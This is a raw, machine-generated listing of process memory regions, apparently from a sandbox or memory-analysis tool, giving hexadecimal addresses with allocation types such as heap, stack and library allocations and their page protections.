5AC0000
trusted library allocation
page read and write
5460000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
52A0000
heap
page read and write
94F0000
trusted library allocation
page read and write
5150000
direct allocation
page read and write
9270000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
4F47000
trusted library allocation
page execute and read and write
77B0000
trusted library allocation
page read and write
9500000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
B0A0000
trusted library allocation
page read and write
9458000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
4991000
heap
page read and write
5279000
heap
page read and write
9200000
trusted library allocation
page read and write
B93C8FA000
stack
page read and write
3AE000
stack
page read and write
73A0000
trusted library allocation
page read and write
34E5000
heap
page read and write
135651CB000
heap
page read and write
A3FE000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
9270000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
9210000
trusted library allocation
page read and write
520A000
heap
page read and write
AF60000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
9495000
trusted library allocation
page read and write
FF1000
trusted library allocation
page read and write
D3EF5FB000
stack
page read and write
5216000
heap
page read and write
93C0000
trusted library allocation
page read and write
5070000
heap
page read and write
4E40000
direct allocation
page read and write
254F9B50000
heap
page readonly
1FB43F60000
trusted library allocation
page read and write
FB0000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
16105C02000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
8450000
unkown
page read and write
75D6000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
4532000
unkown
page read and write
93C0000
trusted library allocation
page read and write
72C0000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
2D17F871000
heap
page read and write
71D0000
trusted library allocation
page execute and read and write
97A0000
trusted library allocation
page read and write
3415000
heap
page read and write
5243000
heap
page read and write
2BD63277000
heap
page read and write
94F0000
trusted library allocation
page read and write
7E98000
trusted library allocation
page read and write
91F0000
trusted library allocation
page read and write
5272000
heap
page read and write
4C2F000
heap
page read and write
C0F5000
trusted library allocation
page read and write
7290000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
A5CE000
stack
page read and write
97D6000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
9270000
trusted library allocation
page read and write
92B0000
trusted library allocation
page read and write
9205000
unkown
page read and write
684000
heap
page read and write
BDB4000
trusted library allocation
page read and write
3190000
trusted library allocation
page readonly
6F0000
remote allocation
page read and write
5231000
heap
page read and write
9760000
trusted library allocation
page read and write
32B0000
heap
page read and write
A400000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
2BD63F40000
unkown
page write copy
9320000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
2F7C000
stack
page read and write
4F04000
heap
page read and write
93D0000
trusted library allocation
page read and write
4A70000
heap
page read and write
B25B000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
74C0000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
7A0000
trusted library allocation
page read and write
512000
unkown
page read and write
C2FB000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9390000
trusted library allocation
page read and write
3339000
heap
page read and write
9520000
trusted library allocation
page read and write
9690000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
1FB3E83F000
heap
page read and write
92F0000
unkown
page read and write
9710000
trusted library allocation
page read and write
543F000
stack
page read and write
72D0000
trusted library allocation
page read and write
7EA8000
trusted library allocation
page read and write
1FB3F8C0000
trusted library section
page readonly
5090000
direct allocation
page read and write
8310000
trusted library allocation
page read and write
20E29A4D000
heap
page read and write
9720000
unkown
page read and write
48C0000
heap
page read and write
523C000
heap
page read and write
93F0000
trusted library allocation
page read and write
740000
heap
page read and write
C331000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
A470000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
58F4000
direct allocation
page read and write
FF0000
trusted library allocation
page read and write
82C0000
trusted library allocation
page read and write
D18000
heap
page read and write
207B677000
stack
page read and write
4407000
unkown
page read and write
8450000
unkown
page read and write
5100000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
526C000
heap
page read and write
72B0000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
20E29A13000
heap
page read and write
9490000
trusted library allocation
page read and write
58FF000
direct allocation
page read and write
9460000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
2BD63229000
heap
page read and write
9280000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
1000000
trusted library allocation
page read and write
9380000
trusted library allocation
page read and write
7EDA000
trusted library allocation
page read and write
7EDA000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
92D0000
unkown
page read and write
92D0000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
A5EE000
trusted library allocation
page read and write
4F20000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
92E0000
unkown
page read and write
1FB3E680000
heap
page read and write
9760000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
5299000
heap
page read and write
4F00000
heap
page read and write
92F0000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
880000
heap
page read and write
9520000
trusted library allocation
page read and write
524A000
heap
page read and write
7310000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
91F0000
trusted library allocation
page read and write
58B5000
trusted library allocation
page read and write
3410000
heap
page read and write
2D180002000
trusted library allocation
page read and write
9295000
unkown
page read and write
684000
heap
page read and write
574C000
trusted library allocation
page read and write
928F000
stack
page read and write
4E14000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
73C0000
trusted library allocation
page read and write
9670000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
20E2A402000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
93C4000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
345F000
stack
page read and write
9480000
trusted library allocation
page read and write
4F46000
trusted library allocation
page read and write
5258000
heap
page read and write
4420000
unkown
page readonly
B050000
trusted library allocation
page read and write
82B0000
trusted library allocation
page read and write
4FEE000
stack
page read and write
3198000
heap
page read and write
B040000
trusted library allocation
page read and write
74C6000
trusted library allocation
page read and write
9500000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
28DC5FF000
stack
page read and write
28DC47F000
stack
page read and write
72F0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
5AEE000
stack
page read and write
8460000
trusted library allocation
page read and write
307F000
stack
page read and write
1FB3F118000
heap
page read and write
2E9A000
unkown
page readonly
9760000
trusted library allocation
page read and write
13565350000
unkown
page readonly
2BD63213000
heap
page read and write
9480000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
13565090000
heap
page read and write
884000
heap
page read and write
15F5000
heap
page read and write
B0C0000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
9265000
trusted library allocation
page read and write
B120000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
843BFE000
unkown
page read and write
8300000
trusted library allocation
page read and write
A430000
trusted library allocation
page read and write
FE0000
trusted library allocation
page read and write
83F0000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
9205000
trusted library allocation
page read and write
A1C0000
trusted library allocation
page read and write
94E0000
trusted library allocation
page read and write
A450000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
71F0000
trusted library allocation
page read and write
20E29A2E000
heap
page read and write
9330000
trusted library allocation
page read and write
AF30000
trusted library allocation
page read and write
9305000
trusted library allocation
page read and write
3390000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
DB0557F000
stack
page read and write
9030000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
94D0000
trusted library allocation
page read and write
322D000
stack
page read and write
A238000
trusted library allocation
page read and write
29A1843C000
heap
page read and write
9260000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
5F166000
unkown
page readonly
92F0000
trusted library allocation
page read and write
B010000
trusted library allocation
page read and write
94F0000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
5295000
heap
page read and write
730000
direct allocation
page execute and read and write
9205000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
8410000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
924E000
stack
page read and write
9380000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
2BD63200000
heap
page read and write
95F0000
unkown
page read and write
3080000
heap
page read and write
91F0000
trusted library allocation
page read and write
8FF7000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
343F000
heap
page read and write
93F0000
trusted library allocation
page read and write
FF0000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
AF80000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
1CB48A2A000
heap
page read and write
9200000
unkown
page read and write
D09690E000
stack
page read and write
9340000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
50BE000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
A421000
trusted library allocation
page read and write
B0B0000
trusted library allocation
page read and write
93E8000
trusted library allocation
page read and write
8FF0000
unkown
page read and write
7290000
trusted library allocation
page read and write
5281000
heap
page read and write
94E0000
trusted library allocation
page read and write
B070000
trusted library allocation
page read and write
7E3B000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
D09688B000
stack
page read and write
B260000
trusted library allocation
page read and write
9590000
trusted library allocation
page read and write
B060000
trusted library allocation
page read and write
28DC4FF000
stack
page read and write
5221000
heap
page read and write
9530000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
29A18429000
heap
page read and write
684000
heap
page read and write
A430000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
5264000
heap
page read and write
F90000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
AF80000
trusted library allocation
page read and write
33C7000
heap
page read and write
91F0000
trusted library allocation
page read and write
524D000
heap
page read and write
93A0000
trusted library allocation
page read and write
1FB3E871000
heap
page read and write
207B37E000
stack
page read and write
B065000
trusted library allocation
page read and write
580A000
trusted library allocation
page read and write
E0F000
heap
page read and write
9290000
trusted library allocation
page read and write
4580000
direct allocation
page execute and read and write
75D0000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
9CE000
stack
page read and write
7040000
heap
page read and write
A410000
trusted library allocation
page read and write
9322000
trusted library allocation
page read and write
1CB49402000
trusted library allocation
page read and write
A450000
trusted library allocation
page read and write
B020000
trusted library allocation
page read and write
3428B4E000
stack
page read and write
9780000
trusted library allocation
page read and write
5225000
heap
page read and write
2D17F829000
heap
page read and write
8450000
trusted library allocation
page read and write
FD0000
trusted library allocation
page read and write
9010000
unkown
page read and write
8FF0000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
1FB3E790000
trusted library section
page read and write
29A1844F000
heap
page read and write
511C000
stack
page read and write
9760000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
7290000
trusted library allocation
page read and write
7E46000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
1FB43D10000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
B1F6000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
828F000
trusted library allocation
page read and write
C354000
trusted library allocation
page read and write
2EB0000
remote allocation
page read and write
5010000
heap
page read and write
A3C2000
trusted library allocation
page read and write
FA0000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
313F000
stack
page read and write
B93C2EC000
stack
page read and write
B050000
trusted library allocation
page read and write
B0B0000
trusted library allocation
page read and write
82C0000
trusted library allocation
page read and write
B020000
trusted library allocation
page read and write
74C0000
trusted library allocation
page execute and read and write
B040000
trusted library allocation
page read and write
6CF000
stack
page read and write
29A18310000
heap
page read and write
93C0000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
3390000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
9206000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
5110000
trusted library allocation
page read and write
93E9000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
FF0000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
4E00000
trusted library allocation
page read and write
4E3E000
stack
page read and write
F4E000
stack
page read and write
93C5000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
C1A3000
trusted library allocation
page read and write
5216000
heap
page read and write
B010000
trusted library allocation
page read and write
9387000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
1FB43E50000
trusted library allocation
page read and write
93C5000
trusted library allocation
page read and write
8BA000
heap
page read and write
5050000
heap
page execute and read and write
75D0000
trusted library allocation
page read and write
51E8000
heap
page read and write
A3F0000
trusted library allocation
page read and write
504F000
stack
page read and write
7370000
trusted library allocation
page read and write
72E0000
trusted library allocation
page execute and read and write
8450000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
6CB000
stack
page read and write
8FF6000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
1FB43E50000
trusted library allocation
page read and write
7270000
trusted library allocation
page read and write
3250000
heap
page read and write
B040000
trusted library allocation
page read and write
8FF0000
unkown
page read and write
336D000
heap
page read and write
9520000
trusted library allocation
page read and write
3280000
heap
page read and write
9200000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
8457000
unkown
page read and write
5F151000
unkown
page execute read
959D000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
B170000
trusted library allocation
page read and write
72C0000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
A470000
trusted library allocation
page read and write
1FB3E620000
heap
page read and write
92D0000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
2BD63302000
heap
page read and write
4E8DA7B000
stack
page read and write
525B000
heap
page read and write
5290000
heap
page read and write
93D0000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
207B77E000
stack
page read and write
8FF0000
trusted library allocation
page read and write
B080000
trusted library allocation
page read and write
A510000
trusted library allocation
page read and write
94F0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
2D17F84F000
heap
page read and write
5248000
heap
page read and write
8450000
unkown
page read and write
AF80000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
9265000
trusted library allocation
page read and write
28DC1FE000
stack
page read and write
9030000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
1CB48B02000
heap
page read and write
2BD63100000
heap
page read and write
5160000
heap
page read and write
B050000
trusted library allocation
page read and write
254F9BC0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
9270000
trusted library allocation
page read and write
D0971FE000
stack
page read and write
845D000
trusted library allocation
page read and write
4EBB000
heap
page read and write
8300000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
B190000
trusted library allocation
page read and write
4E8DB7E000
stack
page read and write
9780000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
91F0000
trusted library allocation
page read and write
5110000
trusted library allocation
page read and write
FD0000
trusted library allocation
page read and write
C2EB000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9317000
trusted library allocation
page read and write
7E30000
unkown
page read and write
2D17F908000
heap
page read and write
8450000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
2BD63300000
heap
page read and write
8450000
unkown
page read and write
5020000
heap
page read and write
9750000
unkown
page read and write
72A0000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
72B6000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
EA0000
unkown
page readonly
5100000
trusted library allocation
page read and write
94C0000
trusted library allocation
page read and write
94F0000
trusted library allocation
page read and write
86E000
stack
page read and write
9810000
trusted library allocation
page read and write
1FB3F002000
heap
page read and write
9480000
trusted library allocation
page read and write
9010000
unkown
page read and write
9490000
trusted library allocation
page read and write
9200000
unkown
page read and write
9010000
trusted library allocation
page read and write
93C5000
trusted library allocation
page read and write
92D5000
unkown
page read and write
4FFE000
stack
page read and write
3337000
heap
page read and write
59BD000
trusted library allocation
page read and write
8450000
unkown
page read and write
77B0000
trusted library allocation
page read and write
B077000
trusted library allocation
page read and write
2F30000
direct allocation
page read and write
FB2000
trusted library allocation
page read and write
16105313000
heap
page read and write
8FF0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
AF70000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9200000
unkown
page read and write
1CB48A47000
heap
page read and write
884000
heap
page read and write
A400000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
B93CC7E000
stack
page read and write
9200000
trusted library allocation
page read and write
5269000
heap
page read and write
9200000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
FD0000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
D3EF0AC000
stack
page read and write
51CC000
direct allocation
page read and write
AC3C000
stack
page read and write
20E29A7F000
heap
page read and write
29A18470000
heap
page read and write
522F000
stack
page read and write
9580000
trusted library allocation
page read and write
2E50000
remote allocation
page read and write
4F20000
heap
page read and write
4DA0000
direct allocation
page read and write
A420000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
6E80000
direct allocation
page read and write
9030000
trusted library allocation
page read and write
82C0000
trusted library allocation
page read and write
B200000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
92E0000
unkown
page read and write
9200000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
20E29B13000
heap
page read and write
4E13000
trusted library allocation
page execute and read and write
5AB7000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page execute and read and write
9300000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
2D17F869000
heap
page read and write
49EE000
stack
page read and write
93F0000
trusted library allocation
page read and write
92CE000
stack
page read and write
9735000
unkown
page read and write
6D30000
direct allocation
page read and write
2FF0000
trusted library allocation
page read and write
1FB3F118000
heap
page read and write
94A0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
845F000
unkown
page read and write
16105202000
heap
page read and write
9523000
trusted library allocation
page read and write
8350000
trusted library allocation
page execute and read and write
9400000
trusted library allocation
page read and write
DF0000
heap
page read and write
92D0000
trusted library allocation
page read and write
8450000
unkown
page read and write
97C0000
trusted library allocation
page read and write
1CB48960000
heap
page read and write
9520000
trusted library allocation
page read and write
7380000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
9655000
trusted library allocation
page read and write
1B55D626000
heap
page read and write
2E50000
remote allocation
page read and write
5100000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
3258000
heap
page read and write
1FB43D00000
trusted library allocation
page read and write
94C0000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9380000
trusted library allocation
page read and write
7640000
heap
page read and write
D096DFB000
stack
page read and write
9780000
trusted library allocation
page read and write
9380000
trusted library allocation
page read and write
82F0000
trusted library allocation
page read and write
9030000
unkown
page read and write
9300000
trusted library allocation
page read and write
93C5000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
4F6D000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
77B8000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
8FF6000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
B130000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
BE82000
trusted library allocation
page read and write
92D0000
unkown
page read and write
93C0000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
730000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
2F31000
stack
page read and write
91F0000
trusted library allocation
page read and write
9390000
trusted library allocation
page read and write
4AEC000
stack
page read and write
9810000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
93C5000
trusted library allocation
page read and write
95A0000
unkown
page read and write
9200000
trusted library allocation
page read and write
93A1000
trusted library allocation
page read and write
5754000
trusted library allocation
page read and write
72FD000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
3429177000
stack
page read and write
33C5000
heap
page read and write
7EF8000
trusted library allocation
page read and write
B93C6F8000
stack
page read and write
8FF0000
trusted library allocation
page read and write
1FB4406F000
heap
page read and write
7F09000
trusted library allocation
page read and write
910F000
stack
page read and write
5100000
trusted library allocation
page read and write
1FB43F40000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
BE29000
trusted library allocation
page read and write
1240000
heap
page read and write
4A7F000
stack
page read and write
8450000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
3390000
trusted library allocation
page read and write
2E90000
remote allocation
page read and write
A1ED000
trusted library allocation
page read and write
9492000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
520A000
heap
page read and write
9010000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
8455000
unkown
page read and write
9030000
unkown
page read and write
47FE000
stack
page read and write
8450000
unkown
page read and write
75D0000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
254F8BE2000
heap
page read and write
4E8D97B000
stack
page read and write
A420000
trusted library allocation
page read and write
6E8C000
direct allocation
page read and write
9520000
trusted library allocation
page read and write
9200000
unkown
page read and write
9610000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
579E000
trusted library allocation
page read and write
1CB48A71000
heap
page read and write
1CB489F0000
trusted library allocation
page read and write
7190000
trusted library allocation
page read and write
C094000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9522000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
867000
heap
page read and write
B060000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
B93C9FE000
stack
page read and write
9450000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
CBC000
stack
page read and write
4EAA000
heap
page read and write
77B0000
trusted library allocation
page read and write
4F33000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
A3E8000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
5104000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
1FB440EA000
heap
page read and write
3428BCE000
stack
page read and write
8450000
trusted library allocation
page read and write
B090000
trusted library allocation
page read and write
8E8000
heap
page read and write
8455000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
330E000
stack
page read and write
9482000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
4F07000
heap
page read and write
9810000
trusted library section
page read and write
FD0000
trusted library allocation
page read and write
9010000
unkown
page read and write
A460000
trusted library allocation
page read and write
9020000
trusted library allocation
page read and write
9225000
trusted library allocation
page read and write
4F8F000
stack
page read and write
4960000
trusted library allocation
page read and write
4D90000
heap
page read and write
9780000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
B070000
trusted library allocation
page read and write
4FE8000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
8455000
trusted library allocation
page read and write
50CC000
stack
page read and write
AF60000
trusted library allocation
page read and write
958D000
stack
page read and write
9520000
trusted library allocation
page read and write
A450000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
9310000
trusted library allocation
page execute and read and write
1FB440F2000
heap
page read and write
73E0000
trusted library allocation
page read and write
1FB4402E000
heap
page read and write
9460000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
C311000
trusted library allocation
page read and write
5252000
heap
page read and write
1CB48A4B000
heap
page read and write
9440000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
9205000
trusted library allocation
page read and write
843B7E000
unkown
page read and write
1CB48A50000
heap
page read and write
4C01000
heap
page read and write
9200000
unkown
page read and write
914D000
stack
page read and write
9480000
unkown
page read and write
9810000
trusted library allocation
page read and write
9730000
unkown
page read and write
254F8B40000
heap
page read and write
DB0507F000
stack
page read and write
4BDF000
heap
page read and write
8EF000
stack
page read and write
2F6D000
stack
page read and write
9200000
trusted library allocation
page read and write
525B000
heap
page read and write
840000
heap
page read and write
51E0000
heap
page read and write
82E0000
trusted library allocation
page read and write
F90000
trusted library allocation
page read and write
FB0000
trusted library allocation
page read and write
AFBD000
stack
page read and write
9310000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
2FDE000
stack
page read and write
92C0000
trusted library allocation
page read and write
1FB43E60000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
4ED3000
heap
page read and write
D0970FD000
stack
page read and write
9015000
trusted library allocation
page read and write
9455000
trusted library allocation
page read and write
94E0000
trusted library allocation
page read and write
8450000
trusted library allocation
page execute and read and write
7380000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
9200000
unkown
page read and write
4B10000
remote allocation
page read and write
9410000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
1CB48A83000
heap
page read and write
BDE2000
trusted library allocation
page read and write
5B03000
trusted library allocation
page read and write
135652E0000
unkown
page read and write
94F0000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
254F8F05000
heap
page read and write
93F0000
trusted library allocation
page read and write
92D0000
unkown
page read and write
5295000
heap
page read and write
9520000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
870000
heap
page read and write
93E0000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
20E299C0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
1FB43F30000
trusted library allocation
page read and write
9520000
trusted library allocation
page execute and read and write
9500000
trusted library allocation
page read and write
1FB3F900000
trusted library section
page readonly
A410000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
1FB44100000
heap
page read and write
2BD630A0000
heap
page read and write
9520000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
1B55D63A000
heap
page read and write
9520000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
1FB44102000
heap
page read and write
B100000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
94C0000
trusted library allocation
page read and write
72B9000
trusted library allocation
page read and write
9340000
trusted library allocation
page read and write
92D0000
unkown
page read and write
93E0000
trusted library allocation
page read and write
C83E3FE000
stack
page read and write
77B0000
trusted library allocation
page read and write
2D81000
unkown
page execute read
8455000
trusted library allocation
page read and write
4BFE000
stack
page read and write
9270000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
1FB43C80000
trusted library allocation
page read and write
8455000
trusted library allocation
page read and write
2F70000
remote allocation
page read and write
5161000
heap
page read and write
5574000
trusted library allocation
page read and write
732D000
trusted library allocation
page read and write
9205000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
7F04000
trusted library allocation
page read and write
5A0C000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
58C0000
direct allocation
page read and write
7F04000
trusted library allocation
page read and write
2EB0000
remote allocation
page read and write
FD0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
AF80000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
1CB48950000
heap
page read and write
5230000
heap
page read and write
7404000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
577C000
trusted library allocation
page read and write
7EF8000
trusted library allocation
page read and write
4DAB000
trusted library allocation
page read and write
7F0000
trusted library allocation
page read and write
A93E000
stack
page read and write
8450000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
EA0000
unkown
page readonly
B060000
trusted library allocation
page read and write
92F0000
unkown
page read and write
75D0000
trusted library allocation
page read and write
1B55D480000
heap
page read and write
7EB2000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
DB0527E000
stack
page read and write
47BE000
stack
page read and write
1FB43E20000
trusted library allocation
page read and write
4E10000
trusted library allocation
page read and write
1000000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
92F6000
trusted library allocation
page read and write
8465000
trusted library allocation
page read and write
B040000
trusted library allocation
